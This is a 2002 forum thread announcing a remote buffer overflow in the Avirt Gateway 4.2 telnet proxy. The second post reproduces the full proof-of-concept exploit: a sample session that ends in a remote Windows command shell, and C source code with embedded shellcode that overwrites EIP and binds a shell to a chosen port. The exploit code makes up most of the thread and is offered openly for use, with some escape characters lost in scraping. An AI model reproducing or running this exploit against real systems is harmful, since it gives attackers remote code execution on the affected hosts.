-
February 14th, 2002, 10:48 PM
#1
Avirt Gateway v4.2-proof of concept
The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a String of about 510bytes at the „Ready>“ prompt will overwrite EIP.
Exploit will bind a shell to a specified port on the attacked host.
Read proof of concept at www.xatrix.org
-
February 15th, 2002, 06:09 AM
#2
And for those who couldnt bother clicking the link...
Avirt Gateway 4.2 remote buffer overflow: proof of concept
The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a String of about 510bytes at the „Ready>“ prompt will overwrite EIP.
Exploit will bind a shell to a specified port on the attacked host.
Example:
bash-2.05$ agate 10.0.0.1 7007
Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)
initialising socket
...initialized
trying to connect
...connected
(waiting)
sending exploit
...sent
(waiting)
...closed
shell bound to port 7007
bash-2.05$ nc -v target 7007
target [10.0.0.1] 7007 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
Exploit:
----------------------------------------------------------------------------cut--------------------------- --------------------------------------------------------
/* agate.c by uid0x00
* Avirt Gateway 4.2 remote exploit
* compile with gcc agate.c -o agate
*
* tested with win2k, sp2
*
* thx to ByteRage, exploit is based on his shellcode
*/
/* Set the following three defines according to the DLL we use */
// MSVCRT.DLL version 6.10.8924.0 (win2K)
#define LoadLibraryRefNEG "x30xCFxFCx87"
#define GetProcAddressRefADD "xFC"
#define newEIP "x60x32xFAx74" // Should JMP/CALL EBX
#include
#include
#include
#include
#include
int main(int argc, char *argv[]) {
int s;
struct sockaddr_in SockAdr;
char exploit[1024];
unsigned short int a_port;
char shellcode[] =
/* ==== SHELLC0DE START ==== */
/* shellcode based on ByteRage's 450byte code (thx for your help man!) */
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xEBx06x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90xEBx06x90x90"newEIP"x90x90x90x90x90x90x90x90x90xE8xFFxFFxFFxFF"
"xC0x5ExACx84xC0x75xFBx8BxFEx33xC9xB1xC1x4Ex80x36x99xE2xFAxBB"LoadLibraryRefNEG
"xF7xDBx56xFFx13x95xACx84xC0x75xFBx56x55xFFx53"GetProcAddressRefADD"xABxAC"
"x84xC0x75xFBxACx3Cx21x74xE7x72x03x4ExEBxEBx33xEDx55x6Ax01x6Ax02xFF"
"x57xE8x93x6Ax10x56x53xFFx57xECx6Ax02x53xFFx57xF0x33xC0x57x50xB0x0C"
"xABx58xABx40xABx5Fx55x57x56xADx56xFFx57xC0x55x57xADx56xADx56xFFx57"
"xC0xB0x44x89x07x57xFFx57xC4x8Bx46xF4x89x47x3Cx89x47x40xADx89x47x38"
"x33xC0x89x47x30x66xB8x01x01x89x47x2Cx57x57x55x55x55x6Ax01x55x55x56"
"x55xFFx57xC8xFFx76xF0xFFx57xCCxFFx76xFCxFFx57xCCx55x55x53xFFx57xF4"
"x93x33xC0xB4x04x50x6Ax40xFFx57xD4x96x6Ax50xFFx57xE0x8BxCDxB5x04x55"
"x55x57x51x56xFFx77xAFxFFx57xD0x8Bx0FxE3x18x55x57x51x56xFFx77xAFxFF"
"x57xDCx0BxC0x74x21x55xFFx37x56x53xFFx57xF8xEBxD0x33xC0x50xB4x04x50"
"x56x53xFFx57xFCx55x57x50x56xFFx77xB3xFFx57xD8xEBxB9xFFx57xE4xD2xDC"
"xCBxD7xDCxD5xAAxABx99xDAxEBxFCxF8xEDxFCxC9xF0xE9xFCx99xDExFCxEDxCA"
"xEDxF8xEBxEDxECxE9xD0xF7xFFxF6xD8x99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFA"
"xFCxEAxEAxD8x99xDAxF5xF6xEAxFCxD1xF8xF7xFDxF5xFCx99xC9xFCxFCxF2xD7"
"xF8xF4xFCxFDxC9xF0xE9xFCx99xDExF5xF6xFBxF8xF5xD8xF5xF5xF6xFAx99xCE"
"xEBxF0xEDxFCxDFxF0xF5xFCx99xCBxFCxF8xFDxDFxF0xF5xFCx99xCAxF5xFCxFC"
"xE9x99xDCxE1xF0xEDxC9xEBxF6xFAxFCxEAxEAx99xB8xCExCAxD6xDAxD2xAAxAB"
"x99xEAxF6xFAxF2xFCxEDx99xFBxF0xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFA"
"xFAxFCxE9xEDx99xEAxFCxF7xFDx99xEBxFCxFAxEFx99x99x9Bx99x82xA1x99x99"
"x99x99x99x99x99x99x99x99x99x99xFAxF4xFDx99x0Dx0A";
/* ==== SHELLC0DE ENDS ==== */
printf("nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)nn");
if(argc n", argv[0]);
return 0;
}
//insert shell port
a_port = htons(atoi(argv[2]));
a_port^= 0x9999;
shellcode[964] = (a_port) & 0xff;
shellcode[965] = (a_port >> 8) & 0xff;
//init the exploit buffer
memset(&exploit, 'xCC', 0x200);
memcpy(&exploit, &shellcode, sizeof(shellcode)-1);
printf("initialising socketn");
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (s) {
printf("...initializedn");
memset(&SockAdr, 0, sizeof(SockAdr));
SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
SockAdr.sin_family = AF_INET;
SockAdr.sin_port = htons(23);
printf("trying to connectn");
if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
printf("...connectedn");
printf("(waiting)n");
sleep(3);
printf("sending exploitn");
send(s, exploit, sizeof(exploit), 0);
printf("...sentn");
printf("(waiting)n");
sleep(3);
printf("...closednshell bound to port %s n", argv[2]);
close(s);
}
else {
printf("... failed errno = %in", errno);
close(s);
return(0);
}
}
}
----------------------------------------------------------------------------cut--------------------------- --------------------------------------------------------
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|